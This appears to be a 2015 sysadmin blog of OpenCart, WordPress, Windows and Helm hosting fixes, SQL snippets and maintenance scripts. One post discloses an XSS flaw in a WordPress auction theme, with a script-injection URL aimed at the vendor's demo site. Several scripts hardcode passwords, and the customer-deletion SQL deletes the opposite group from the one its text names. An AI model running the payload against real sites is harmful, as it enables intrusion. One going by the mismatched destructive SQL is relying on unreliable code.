Saturday, 12 December 2015

Rejoin hjsplit files on Mac OSX, linux and bsd

open the terminal and just run the cat command

cat yourfile.extension.001 yourfile.extension.02 yourfile.extension.00X > yourfile.extension

Friday, 4 December 2015

[FIX] OPENCART - Call to a member function getFirstName() on a non-object

The error
Call to a member function getFirstName() on a non-object

could appear if there's something wrong in your admin configuration file.


Follows a sample configuration file for the admin area

<?php
// HTTP
define('HTTP_SERVER', 'http://www.example.it/admin/');
define('HTTP_CATALOG', 'http://www.example.it/');

// HTTPS
define('HTTPS_SERVER', 'http://www.example.it/admin/');
define('HTTPS_CATALOG', 'http://www.example.it/');

// DIR
define('DIR_APPLICATION', '/var/www/vhosts/example.it/httpdocs/admin/');
define('DIR_SYSTEM', '/var/www/vhosts/example.it/httpdocs/system/');
define('DIR_LANGUAGE', '/var/www/vhosts/example.it/httpdocs/admin/language/');
define('DIR_TEMPLATE', '/var/www/vhosts/example.it/httpdocs/admin/view/template/');
define('DIR_CONFIG', '/var/www/vhosts/example.it/httpdocs/system/config/');
define('DIR_IMAGE', '/var/www/vhosts/example.it/httpdocs/image/');
define('DIR_CACHE', '/var/www/vhosts/example.it/httpdocs/system/cache/');
define('DIR_DOWNLOAD', '/var/www/vhosts/example.it/httpdocs/system/download/');
define('DIR_UPLOAD', '/var/www/vhosts/example.it/httpdocs/system/upload/');
define('DIR_LOGS', '/var/www/vhosts/example.it/httpdocs/system/logs/');
define('DIR_MODIFICATION', '/var/www/vhosts/example.it/httpdocs/system/modification/');
define('DIR_CATALOG', '/var/www/vhosts/example.it/httpdocs/catalog/');

// DB
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'usert');
define('DB_PASSWORD', 'password');
define('DB_DATABASE', 'db_example');
define('DB_PREFIX', 'oc_');

Thursday, 26 November 2015

FIX - Wordpress Title not showing up in the home page.


If you have WordPress wp_title() returning empty/blank content on index page you can try to modify your theme with the following code for the title:



    <title><?php is_front_page() ? bloginfo('name') : wp_title(''); ?></title>

It will use the blog name as title for the front page.


Tuesday, 24 November 2015

How to disable mouse right click. Disable image drag and save. Jquery

Jquery disable mouse right click. Disable image drag and save.

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0-alpha1/jquery.min.js" type="text/javascript"></script>

<script type="text/javascript">
$(document).ready(function(){$('img').on('contextmenu',function(e){return false;});$('img').on('dragstart', function(e){return false;});});
</script>




FIX Opencart - Warning: vsprintf(): Too few arguments in /admin/controller/dashboard/activity.php on line 19


Warning: vsprintf(): Too few arguments in /admin/controller/dashboard/activity.php on line 19


Backup before doing anything!



The problem can be probably missing values in the data of the  customer's activity or the table that is missing after an upgrade.


You can look in your table and find the problem in a serialized (before 2.1.0.1) value or convert the values (happens when upgrading to 2.1.0.1) in a json readable format.
If you just don't care about the activities data (it's not a big issue) you can truncate the table and accept all the new data.

TRUNCATE TABLE `oc_customer_activity`;

In the worst case you can recreate the customer_activity table
DROP TABLE IF EXISTS `oc_customer_activity`;
CREATE TABLE `oc_customer_activity` (
`activity_id` int(11) NOT NULL AUTO_INCREMENT,
`customer_id` int(11) NOT NULL,
`key` varchar(64) NOT NULL,
`data` text NOT NULL,
`ip` varchar(40) NOT NULL,
`date_added` datetime NOT NULL,
PRIMARY KEY (`activity_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;



Friday, 13 November 2015

wordpress sitemile auctiontheme - XSS


The xss can be used almost anywhere

onlinedemo.sitemile.com/auction/advanced-search/?auction_ID=&term=aaa&price_min=&price_max=&zip_code=&radius=&auction_location_cat=&auction_cat_cat=&ref-search

example:
http://onlinedemo.sitemile.com/auction/advanced-search/?auction_ID=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


Wednesday, 11 November 2015

Windows 10 - Start button is not working, windows photo image viewer is crashing, cannot close applications from the taskbar.



I really don't know what happened but I got several problems with a fresh installation of windows 10:

  • Start button not working
  • windows photo image viewer crashing
  • cannot close applications from the taskbar
  • SFC /scannow - not working
  • ... and so on

Use explorer (or from the task manager or win button+R) to run cmd.exe (as administrator) from %windir%\system32 and then run "powershell.exe" otherwise run directly %windir%\winsxs\powershell.exe (as administrator).

Paste the following string in the powershell and wait





Get-AppXPackage -AllUsers | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}


I suppose that it should re-register the installed Apps from the xml manifests.








references:
http://www.thewindowsclub.com/start-menu-does-not-open-windows-10
https://technet.microsoft.com/en-us/library/hh856044.aspx?f=255&MSPPError=-2147217396
 


Wednesday, 4 November 2015

tp-link tl-wn723n - ic 8853a USB\VID_0BDA&PID_8179 Driver Download

USB\VID_0BDA&PID_8179 Driver Download
tp-link  tl-wn723n - ic 8853a USB\VID_0BDA&PID_8179 Driver Download

All the drivers that I've downloaded/tested from the official pages seem to not work.
After searching a little bit I've found that this driver, from medion, works without problem.
http://download.medion.com/downloads/treiber/wlan_e421xw8x.exe

Saturday, 31 October 2015

Bazaar for windows portable - win32 bzr.exe

Bazaar for windows portable - win32 bzr.exe

If you need a fast way to use bazaar to download launchpad repositories, from windows, without losing too much time, you can download from here a version that should work on x32 and 64 bit versions of windows.


bazaar for windows 10.
bazaar for windows 8.
bazaar for windows 7.
bazaar for windows xp.

You can download here bazaar portable for Windows

Sunday, 4 October 2015

Drivers dell inspiron 1545 Intel 1545 Video Card



PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07
PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028
PCI\VEN_8086&DEV_2A42&CC_030000
PCI\VEN_8086&DEV_2A42&CC_0300

After several crashes and problems I've found a decent driver that works on windows 7 and 8


thanks to the eightforums
http://www.eightforums.com/graphic-cards/4418-mobile-intel-series-4-intel-hd-graphics-1st-generation.html

you can download 64 and 32 bit versions that are working for sure on  this specific model!
64bit Win7Vista8_64_151719_v2.exe
32bit Win7Vista8_151719_v2.exe

Mirrors:

64 bit - http://multiupload.biz/1eh0sfmlik56/Win7Vista8_64_151719_v2_MultiUpload.biz.exe.html
rapidgator.net    http://multiupload.biz/ra_1eh0sfmlik56
sendmyway.com    http://multiupload.biz/sw_1eh0sfmlik56
solidfiles.com    http://multiupload.biz/se_1eh0sfmlik56
speedyshare.com    http://multiupload.biz/s2_1eh0sfmlik56

http://multiupload.biz/k4k56wixcyb6/Win7Vista8_151719_v2.exe.html
rapidgator.net    http://multiupload.biz/ra_k4k56wixcyb6
sendmyway.com    http://multiupload.biz/sw_k4k56wixcyb6
solidfiles.com    http://multiupload.biz/se_k4k56wixcyb6
speedyshare.com    http://multiupload.biz/s2_k4k56wixcyb6

Thursday, 1 October 2015

Opencart - moving all the products from a category (id) to another category (id)

Moving all the products from category (id) is 3 in the category 1

UPDATE oc_product_to_category set category_id = '1' where category_id = '3';

Wednesday, 30 September 2015

Opencart - SQL to Delete customers of a specifi Users Group and move all the customers to the 1st users group


In this example we delete all the customers of the group with ID 3 and move all the other customers to the first group



DELETE FROM oc_customer_activity WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_history WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_ip WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_online WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_reward WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer_transaction WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);


DELETE FROM oc_address WHERE customer_id IN (
 SELECT oc_customer.customer_id  FROM `oc_customer` where customer_group_id != 3
);

DELETE FROM oc_customer WHERE customer_group_id != 3;



/*moving all the users to the 1st customer_group_id 1 */
UPDATE `oc_customer` SET `customer_group_id` = '1'

Opencart - mass update price by percentage, change class id and so on. Simple Sql queries

Opencart disable products with price zero


Sometimes there are products with price zero, or other specific column/value, that need to be disabled.


It's quite easy to update all your products with this sql UPDATE.


    update oc_product set status = 0 where price = 0.0000;


Mass Update the prices of the products in opencart


lowering the price with -22% - For example when you've imported prices including taxes and you want to add a tax class

    update oc_product set price = (price / 1.22);


rising the price with +22% (ex. iva italiana)

    update oc_product set price = (price * 1.22);



Mass Update the tax class of the products in opencart


    update oc_product set tax_class_id = 1;

if you want to remove the class id from all the products

    update oc_product set tax_class_id = 0;

opencart disable products with price zero

Sometimes there are products with price zero, or other specific column/value, that need to be disabled.

It's quite easy to update all your products with this sql UPDATE.

update oc_product set status = 0 where price = 0.0000;


Opencart cannot login in frontend and backend. No error message

Problem:
Opencart cannot login in frontend and backend.
No error messages are appearing when you login with the correct credentials.

Solution:
Clear the cache of VQMOD (if installed) in vqmod/vqcache/
Fix the permission in the vqmod folder (set to writeable).

Tuesday, 29 September 2015

opencart - sql to update all the images with the model name



UPDATE oc_product SET oc_product.image = CONCAT('image/catalog/yourfolder/', LCASE(TRIM(oc_product.model)), '.jpg')


Change your folder accordingly and remember to use lower case chars for your file names otherwise remove LCASE.

Monday, 28 September 2015

mysql dump and save batch

mysql dump and save with a batch file. It's quite old but works.





SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\mysql.7z"
SET mysqldir=c:\mysql\bin
SET mysqluser=root
SET mysqlpassword=pass

REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"

REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
"%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"



%SEVENPATH% %ADDUP% -ms=off -pfuxedboost -t7z  %SAVEDATA% "%bkdir%\backup.sql"

del "%bkdir%\backup.sql"

IIS Log cleaner (old) method to clean all the IIS logs

IIS Log cleaner






'Determine the number of days for which you want to keep logs
logDelDays = 30

'Main driver
purgeIISLogs("W3SVC")
purgeIISLogs("MSFTPSVC")

'Purge IIS logs
Sub purgeIISlogs(strService)
    delCount   = 0
    Set fso    = CreateObject("Scripting.FileSystemObject")
    Set objIIS = GetObject("IIS://" & getComputer() & "/" & strService)
    For Each objweb in objIIS
        If lCase(objweb.Class) = "iiswebserver" _
        Or lCase(objweb.Class) = "iisftpserver" Then
            fLogDirPath = objweb.LogFileDirectory & "\" & strService & objweb.name
            If fso.FolderExists(fLogDirPath) Then
                For Each fLog in fso.GetFolder(fLogDirPath).Files
                    If UCase(Left(fLog.Name,2)) = "EX" And UCase(Right(fLog.Name,4)) = ".LOG" Then
                        fileDate = cDate(Mid(fLog.name,7,2) & " " & monthname(cint(Mid(fLog.name,5,2)),true) & " " & Mid(fLog.name,3,2))
                        If fileDate < DateAdd("d", now(), -logDelDays) Then
                            delCount = delCount + 1
                            fLog.Delete
                        End If
                    End If
                Next
                Wscript.Echo "Purged " & delCount & " logs for " & objweb.ServerComment
            End If
        End If
    Next
    Set objIIS = nothing
    Set fso    = nothing
End Sub

'Get computer name
Function getComputer()
    Set objNet = WScript.CreateObject("WScript.Network")
    getComputer= objNet.ComputerName
    Set objNet = Nothing
End Function

Simple script to backup the helm db.

Simple script to backup the helm db. It's quite old and I used it a long time ago.





@echo off


SET bkdir=d:\manualbackup\data
SET SAVEDATA="%bkdir%\helmdb.7z"
SET mysqldir=c:\mysql\bin
SET mysqlpassword=pass
REM 7-zip executable path
SET SEVENPATH="%PROGRAMFILES%\7-Zip\7z.exe"
SET zippass=pass

REM zipped file to save data

SET ADDUP=a
IF EXIST %SAVEDATA% SET ADDUP=u

@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
REM "%mysqldir%\mysqldump.exe" -u %mysqluser% -p%mysqlpassword% --opt --all-databases >"%bkdir%\backup.sql"

osql -E -S .\Helm -Q "BACKUP DATABASE helmdb TO DISK='%bkdir%\helmdb2.dat'"






if exist %bkdir%\helmdb2.dat goto exist
goto end
:exist
ren "%bkdir%\helmdb2.dat" helmdb.dat
%SEVENPATH% %ADDUP% -ms=off -p%zippass% -t7z  %SAVEDATA% "%bkdir%\helmdb.dat"
del "%bkdir%\helmdb.dat" "%bkdir%\helmdb2.dat"


:end

command line to scan with clamav clamwin and save the outpu to a log file

command line to scan with clamav clamwin and save the outpu to a log file


C:\clamav-devel\bin\clamscan --recursive --infected --stdout --log=log.wri c:\

How to restore permissions in the web folders - script restore permissions webfolders.vbs (old)



How to restore permissions in the web folders - script
restore permissions webfolders.vbs





'-------------------------------------------------------------
' Domains Folders Permissions Rebuild Script
' ============================================================
' Re-adds the permissions for the IIS anonymous users to the
' domains folders
' ------------------------------------------------------------
' Copyright © 2004 Andrew Taylor
' ------------------------------------------------------------
' Usage: Save this script as a .vbs file and run:
'        cscript.exe "c:\PermissionsRebuild.vbs"
' ------------------------------------------------------------
' Enquiries to andy@4dhosting.com
' I disclaim all responsibility for results of this script
' which is run at your own risk
'-------------------------------------------------------------

'-------------------------------------------------------------
' Configuration variables
'-------------------------------------------------------------

Const strDBServer = "localhost"
Const strDBName = "HelmDb"
Const strDBUser = "sa"
Const strDBPassword = "password"

Const strDomains = "c:\domains\"

Const strLogFile = "c:\PermissionsRebuild.log"

Const strAppPath = "c:\SetACL\SetACL.exe"

'-------------------------------------------------------------
' Do not edit below here
'-------------------------------------------------------------

ERR_NTFS_USER_LOOK_UP_FAILED = 1
ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR = 2
ERR_CMD_EXECUTION_FAILED = 3

GENERIC_DELETE = &H10000
ADS_RIGHT_READ_CONTROL = &H20000
ADS_RIGHT_WRITE_DAC = &H40000
ADS_RIGHT_WRITE_OWNER = &H80000
ADS_RIGHT_SYNCHRONIZE = &H100000
ADS_RIGHT_ACCESS_SYSTEM_SECURITY = &H1000000
GENERIC_READ = &H80000000
GENERIC_WRITE = &H40000000
GENERIC_EXECUTE = &H20000000
GENERIC_ALL = &H10000000
ADS_RIGHT_DS_CREATE_CHILD = &H1
ADS_RIGHT_DS_DELETE_CHILD = &H2
ADS_RIGHT_ACTRL_DS_LIST = &H4
ADS_RIGHT_DS_SELF = &H8
ADS_RIGHT_DS_READ_PROP = &H10
ADS_RIGHT_DS_WRITE_PROP = &H20
ADS_RIGHT_DS_DELETE_TREE = &H40
ADS_RIGHT_DS_LIST_OBJECT = &H80
ADS_RIGHT_DS_CONTROL_ACCESS = &H100

COMMON_ADD = &H1201B6
COMMON_ADD_READ = &H1201BF
COMMON_READ = &H1200A9
COMMON_CHANGE = &H1301BF
COMMON_FULL_CONTROL = GENERIC_ALL
COMMON_ALL = &H1F01FF

NO_INHERITANCE = &H0
ALL_INHERIT_ACE = &H3

OBJECT_INHERIT_ACE = &H1
CONTAINER_INHERIT_ACE = &H2
NO_PROPAGATE_INHERIT_ACE = &H4
INHERIT_ONLY_ACE = &H8
INHERITED_ACE = &H10
VALID_INHERIT_FLAGS = &H1F

SET_ACCESS = 1
SET_DENY = 0

' setup connection to the database
Set db = CreateObject("ADODB.Connection")
strConn = "Provider=SQLOLEDB;Server=" & strDBServer & ";Database=" & strDBName & ";user ID=" & strDBUser & ";password=" & strDBPassword & ";"
db.Open strConn

' setup log file
Set oFSO = CreateObject("Scripting.FileSystemObject")
Set oFile = oFSO.CreateTextFile(strLogFile, true)

Set oFolder = oFSO.GetFolder(strDomains)

' go through each object in IIS
For Each oSubFolder in oFolder.SubFolders

   ' get domain and current anon user details
   strDomain = oSubFolder.Name

   ' log these details
   LogEvent "[+] Web Site: " & strDomain

   strNewUsername = GetAnonUser(strDomain)
   strNewPassword = GetAnonPassword(strDomain)

   ' if both username and password are present
   If strNewUsername <> "" And strNewPassword <> "" Then

      ' log these details
      LogEvent "  [-] Username: " & strNewUsername
      LogEvent "  [-] Password: " & strNewPassword

      ' if the anon user does not exist, create it
      If Not DoesUserExist(strNewUsername) Then
         LogEvent "  [-] Creating user"
         CreateUser strNewUsername, strNewPassword
      Else
         LogEvent "  [-] Resetting user password"
         SetPassword strNewUsername, strNewPassword
      End If

      LogEvent "  [-] Setting anonymous user details"
     
      strResult = SetFolderPermissions(SET_ACCESS, strServerName, strNewUsername, oSubFolder.Path, COMMON_CHANGE, ALL_INHERIT_ACE)
  
      If strResult <> "" Then

         ' log error
         LogEvent "  [!] Error updating permissions"

      Else

         ' log completion
         LogEvent "  [=] Details updated"

      End If

   Else

      LogEvent "  [=] Non-Helm site"

   End If

Next


' clear objects
Set oFolder = Nothing
Set rsDomains = Nothing

' close database
db.Close
Set db = Nothing

' get computer name
Function GetComputer()

   Set objNet = WScript.CreateObject("WScript.Network")
   GetComputer = objNet.ComputerName
   Set objNet = Nothing

End Function

' create new user with correct parameters
Sub CreateUser(strUserName, strPassword)

   strGroupName = "HELMWEBUSERS"

   On Error Resume Next

   Set oDomain = GetObject("WinNT://" & GetComputer())
   Set oUser = oDomain.Create("user", strUserName)
   oUser.SetPassword strPassword
   oUser.FullName = strUserName
   oUser.SetInfo

   strFlags = oUser.Get("UserFlags")

   oUser.Put "UserFlags", strFlags OR &H00040
   oUser.Put "UserFlags", strFlags OR &H10000

   oUser.SetInfo

   Set oGroup = oDomain.GetObject("Group", strGroupName)
   oGroup.Add "WinNT://" & GetComputer() & "/" & strUserName
   Set oGroup=Nothing

   If Err.Number = 0 Then
      CreateUser = True
   Else
      CreateUser = False
   End If

   Set oUser = Nothing
   Set oDomain = Nothing

   Err.Clear

End Sub

' determine if the user already exists
Function DoesUserExist(strUserName)

   On Error Resume Next

   Set oUser = GetObject("WinNT://" & GetComputer() & "/" & strUserName)

   If Err.Number = 0 Then
      DoesUserExist = True
   Else
      DoesUserExist = False
   End If

   Err.Clear

End Function

' resets the user's password
Function SetPassword(strUserName, strPassword)

   Set oUser = GetObject("WinNT://" & GetComputer() & "/" & strUserName)
   oUser.SetPassword strPassword
   oUser.SetInfo

   If Err.Number = 0 Then
      SetPassword = True
   Else
      SetPassword = False
   End If

   Err.Clear

End Function

' log events to screen and file
Sub LogEvent(strLog)

   oFile.WriteLine strLog
   WScript.Echo strLog

End Sub

' gets the domains anon username
Function GetAnonUser(strDomain)

   intDomainId = GetDomainId(strDomain)

   Set rsUsername = CreateObject("ADODB.Recordset")
   strSQL = "SELECT HostDomainProperty.PropertyValue FROM HostDomainProperty INNER JOIN HostDomain ON HostDomain.DomainId = HostDomainProperty.DomainId WHERE HostDomainProperty.PropertyName = 'AnonUser' AND HostDomain.DomainId=" & intDomainId & ";"
   rsUsername.Open strSQL, db

   If Not rsUsername.EOF Then
      GetAnonUser = rsUsername("PropertyValue")
   Else
      GetAnonUser = ""
   End If

   rsUsername.Close
   Set rsUsername = Nothing

End Function

' gets the domains anon password
Function GetAnonPassword(strDomain)

   intDomainId = GetDomainId(strDomain)

   Set rsPassword = CreateObject("ADODB.Recordset")
   strSQL = "SELECT HostDomainProperty.PropertyValue FROM HostDomainProperty INNER JOIN HostDomain ON HostDomain.DomainId = HostDomainProperty.DomainId WHERE HostDomainProperty.PropertyName = 'AnonPassword' AND HostDomain.DomainId=" & intDomainId & ";"
   rsPassword.Open strSQL, db

   If Not rsPassword.EOF Then
      GetAnonPassword = rsPassword("PropertyValue")
   Else
      GetAnonPassword = ""
   End If

   rsPassword.Close
   Set rsPassword = Nothing

End Function

' gets the domain ID from the name
Function GetDomainId(strDomain)

   Set rsDomain = CreateObject("ADODB.Recordset")
   strSQL = "SELECT * FROM HostDomain WHERE DomainName='" & strDomain & "';"
   'LogEvent strSQL
   rsDomain.Open strSQL, db

   If Not rsDomain.EOF Then
      intDomainId = CLng(rsDomain("DomainId"))
   Else

      intPtr = InStr(strDomain, ".")

      If intPtr > 0 Then
         strDomain = Mid(strDomain, intPtr + 1)
         intDomainId = GetDomainId(strDomain)
      Else
         intDomainId = 0
      End If

   End If

   rsDomain.Close
   Set rsDomain = Nothing

   GetDomainId = intDomainId

End Function

Function SetFolderPermissions(strAccessType, strTrusteeDomain, strTrusteeUsername, strFileName, strFileMask, strFileInheritance)
  
    On Error Resume Next
  
    Dim strCMD
    Dim cmdErrorCode
  
    If Right(strFileName, 1) = "\" Then strFileName = Left(strFileName, Len(strFileName) - 1)
  
    strCMD = """" & strAppPath & """ -on """ & strFileName & """ -ot file -actn ace -ace """
  
    strCMD = strCMD & "n:" & strTrusteeDomain & "\" & strTrusteeUsername
  
    Select Case strFileMask
        Case COMMON_ADD, COMMON_ADD_READ
            strCMD = strCMD & ";p:add_file"
        Case COMMON_READ, GENERIC_READ
            strCMD = strCMD & ";p:read"
        Case COMMON_CHANGE
            strCMD = strCMD & ";p:change"
        Case COMMON_FULL_CONTROL, COMMON_ALL, GENERIC_ALL
            strCMD = strCMD & ";p:full"
        Case GENERIC_DELETE
            strCMD = strCMD & ";p:delete"
        Case ADS_RIGHT_READ_CONTROL
            strCMD = strCMD & ";p:read_dacl"
        Case ADS_RIGHT_WRITE_DAC
            strCMD = strCMD & ";p:write_dacl"
        Case ADS_RIGHT_WRITE_OWNER
            strCMD = strCMD & ";p:write_owner"
        Case GENERIC_WRITE
            strCMD = strCMD & ";p:write"
        Case GENERIC_EXECUTE
            strCMD = strCMD & ";p:read_ex"
        Case Else
            strCMD = strCMD & ";p:change"
    End Select
  
    Select Case strFileInheritance
        Case NO_INHERITANCE
            strCMD = strCMD & ";i:np"
        Case ALL_INHERIT_ACE
            strCMD = strCMD
        Case OBJECT_INHERIT_ACE
            strCMD = strCMD & ";i:so"
        Case CONTAINER_INHERIT_ACE
            strCMD = strCMD & ";i:sc"
        Case NO_PROPAGATE_INHERIT_ACE
            strCMD = strCMD & ";i:np"
        Case INHERIT_ONLY_ACE
            strCMD = strCMD & ";i:io"
        Case INHERITED_ACE
            strCMD = strCMD & ";i:io"
    End Select
  
    Select Case strAccessType
        Case SET_ACCESS
            strCMD = strCMD & ";m:set"
        Case SET_DENY
            strCMD = strCMD & ";m:deny"
    End Select
  
    strCMD = strCMD & ";w:dacl"" -silent"

    cmdErrorCode = ExecCmd(strCMD)

    If cmdErrorCode <> 0 Then Err.Raise ERR_NTFS_USER_LOOK_UP_FAILED
    If Len(cmdOutput) > 0 Then Err.Raise ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR

   If Err.Number <> 0 Then

      Select Case Err.Number
         Case ERR_NTFS_USER_LOOK_UP_FAILED
            SetFolderPermissions = "Could not set permissions for " & strTrusteeUsername
         Case ERR_NTFS_CANT_SET_SECURITY_DESCRIPTOR
            SetFolderPermissions = "Could not set permissions on " & strFileName
      End Select

      Err.Clear

   End If

End Function

Function ExecCmd(strCMD)

   On Error Resume Next

   Set objWshShell = WScript.CreateObject("WScript.Shell")
   Set objFSO = CreateObject("Scripting.FileSystemObject")

   strTempFile = objFSO.GetTempName
   strPath = objFSO.GetSpecialFolder(TemporaryFolder)
   strTempFile = strPath & "\" & strTempFile

   ExecCmd = objWshShell.Run(strCMD, 0, True)
  
   cmdOutput = objFSO.OpenTextFile(strTempFile).ReadAll
   objFSO.DeleteFile strTempFile

   Err.Clear

End Function

Batch file to easily optimize the mysql database

Batch file to easily optimize the mysql database


SET mysqldir=c:\mysql\bin
SET mysqluser=root
SET mysqlpassword=mypass


@REM Change to mysqldir
CD %mysqldir%

@REM dump database. This is all one line
"%mysqldir%\mysqlcheck" -u %mysqluser% -p%mysqlpassword% --repair --analyze --optimize --all-databases --auto-repair"

old vb script to restore dns on windows server - Do not use on new windows servers


old vb script to restore dns on windows server - Do not use on new windows servers.

 restoredns.vbs





'-------------------------------------------------------------
' Global DNS Rebuild Script
' ~~~~~~~~~~~~~~~~~~~~~~~~~
' Rebuilds your entire DNS structure for all domains in Helm.
' Usefull for when moving servers, changing IPs, or for fixing
' messed up DNS records.
'
' It would be best to delete your DNS zones on your DNS server
' before running, to ensure new DNS zones are brand new!
'
' This script works with multi-server setups, run it on the
' control server!
'
' If you are using the script to change servers, or update IPs
' update all your system settings in the Helm Control Panel,
' then run this script.'
' This also rebuilds global records that ADMIN and RESELLERS
' have added. It gets the entrys the domain's reseller has
' added, then gets the entrys the ADMIN has added.
'
' UPDATED 10/11/2004: Now works with TXT records and dynamic
'                     [DomainName] variables.
' ------------------------------------------------------------
' © Copyright 2004 Warren Ashcroft (HelmPlus)
' All Rights Reserved
' This script must not be distributed without permission
' ------------------------------------------------------------
' Usage: Save this script as a VBS file and run like this:
'        cscript.exe "c:\path\to\file.vbs"
' ------------------------------------------------------------
' For support email support@helmPlus
' Results of this are not my responsibility
'-------------------------------------------------------------

'-------------------------------------------------------------
' Configuration variables
'-------------------------------------------------------------
' Your ADMIN password for Helm
Dim AdminPass
AdminPass = "RR35RUJR"


'-------------------------------------------------------------
' DO NOT edit below here
'-------------------------------------------------------------
Dim oDomain, oDNS, oFTP, oEmail, oWebsite, oDomainAlias, oGlobalDNSRecord, oService, oServiceSet
Dim rsDomain, rsDomainAlias, rsGlobalDNS, rsGlobalDNSAdmin, rsDNS, rsService, rsServiceSet
Dim iCount, DomainID, DomainName, ResellerAccountNumber, ActionResult
Dim DNSRecordID, DomainAliasID, AliasName

Const DNS_A = 3      ' DNS_A
Const DNS_MX = 4     ' DNS_MX
Const DNS_CNAME = 5  ' DNS_CNAME
Const DNS_TXT = 6    ' DNS_TXT

Set oDomain = CreateObject("HELM.CDomain")
Set oDNS = CreateObject("HELM.CDNS")
Set oFTP = CreateObject("HELM.CFTP")
Set oEmail = CreateObject("HELM.CEmail")
Set oWebsite = CreateObject("HELM.CWebsite")
Set oService = CreateObject("HELM.CService")
Set oServiceSet = CreateObject("HELM.CServiceSet")
Set oDomainAlias = CreateObject("HELM.CDomainAlias")
Set oGlobalDNSRecord = CreateObject("HELM.CGlobalDNSRecord")

On Error Resume Next

WScript.Echo "Global DNS Rebuild Script"
WScript.Echo "© Copyright 2004 Warren Ashcroft (HelmPlus)"
WScript.Echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
WScript.Echo ""

Set rsDomain = oDomain.SearchEx()

If Not rsDomain.EOF Then rsDomain.MoveFirst
Do While Not rsDomain.EOF
   ' Set some standard data variables
   iCount = iCount + 1
   DomainID = rsDomain("DomainID")
   DomainName = rsDomain("DomainName")
   ResellerAccountNumber = rsDomain("ResellerAccountNumber")

   ' Setup the various recordsets
   Set rsGlobalDNS = oGlobalDNSRecord.SearchEx(, ResellerAccountNumber)
   Set rsGlobalDNSAdmin = oGlobalDNSRecord.SearchEx(, "ADMIN")
   Set rsDomainAlias = oDomainAlias.SearchEx(, DomainID)
   Set rsDNS = oDNS.SearchEx(, DomainID)
   Set rsServiceSet = oServiceSet.SearchEx(, , DomainID, , "2")
   Set rsService = oService.SearchEx(, rsServiceSet("ServiceSetId"))

   WScript.Echo "[!] Processing Domain: " & UCase(DomainName)

   WScript.Echo "  [-] Removing... Removing all DNS A records!"
   ActionResult = oDNS.RemoveARecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS MX records!"
   ActionResult = oDNS.RemoveMXRecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS CNAME records!"
   ActionResult = oDNS.RemoveCNAMERecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS ID records from Helm!"
   If Not rsDNS.EOF Then rsDNS.MoveFirst
   Do While Not rsDNS.EOF
      DNSRecordID = rsDNS("DNSRecordID")
    
      If DNSRecordID <> "" Then
         WScript.Echo "    [-] Removing...  DNS ID: " & DNSRecordID & "!"
         ActionResult = oDNS.RemoveRecord("ADMIN", AdminPass, DNSRecordID)
         If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
         End If
      End If
      rsDNS.MoveNext
   Loop

   WScript.Echo "  [-] Removing... Removing the domain ZONE completely!"
   ActionResult = oDNS.RemoveDomainEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [+] Adding...   Readding the domain zone!"
   ActionResult = oDNS.CreateDomainEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [>] Adding...   Readding standard DNS records!"

   WScript.Echo "    [+] Adding...    DNS A Record: @!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "@", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: *!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "*", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: WWW!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "www", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: FTP!"
